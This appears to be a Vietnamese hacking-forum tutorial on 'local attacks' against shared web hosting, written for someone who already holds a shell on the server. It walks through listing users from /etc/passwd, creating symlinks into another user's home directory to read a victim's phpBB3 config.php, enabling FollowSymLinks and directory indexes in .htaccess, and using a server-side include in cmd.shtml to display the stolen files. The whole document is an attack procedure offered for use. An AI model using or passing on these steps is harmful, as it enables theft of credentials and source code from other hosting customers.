Hướng dẫn local attack, symlink từ a đến z

Giả sử đã có shell trên sever --
I. Symlink
Tìm xem có những user nào trên sever. Gõ đoạn lệnh sau và Excute

PHP Code:

cat /etc/passwd  

nếu không được thì thử

PHP Code:

less /etc/passwd  

Okie. Đã có list user. Muốn xem thử thử web user như thế nào thì chạy 
http://ip/~ten_user - Một số ko hỗ trợ cái này.
Bây giờ đến vấn đê chính.
Khi ta đã tìm được user thì excute lệnh sau, Lệnh Symlink:

PHP Code:

ln -s /.../.../file(folder)_cần_xem file_ghi_nội_dung  

Đoạn /.../.../ là đường dẫn. Ví dụ với cp11 ta có đoạn lệnh sau:

PHP Code:

ln -s /home/tên_user/file(folder)_cần_xem file_ghi  

VD Cụ thể hơn nhé, cp11, Ta sẽ view victim "abcde" mã nguồn phpbb3, View thư mục public_html , styles và file config.php .Ghi vào file cyp.txt , cyp1.txt , cyp2.txt
View thư mục public_html:
Thư mục styles
file config.php
Xong ta chạy 
http://link.host.chứa.shell/tên_file_ghi để xem.
Nếu error 403 thì ta xem lại đường dẫn.
Đường dẫn đúng thì ta tạo (sửa nếu đã có) file .htaccess với nội dung sau.

PHP Code:

Options +FollowSymLinks 
DirectoryIndex hocit.html 
Options +Indexes  

cho phép symlink, đổi file index.php thành abcde.html khi view folder). Rồi chạy lại link xem nha.
Nếu không được nữa, ta sang phần 2.
II. View Symlink bằng cmd.shtml
Tạo file cmd.shtml với nội dung sau

PHP Code:

<!--#include virtual="file_ghi" -->  

Ví dụ. Ta view file cyp2.txt (ghi file config.php)

PHP Code:

<!--#include virtual="cyp2.txt" -->  

Xong chạy link sau http://link.host.chứa.shell/cmd.shtml
Nếu trắng trang thì viewsource xem nhé.
Còn lỗi [an error occurred while processing this directive] thì đợi tut khác nhé.
End tut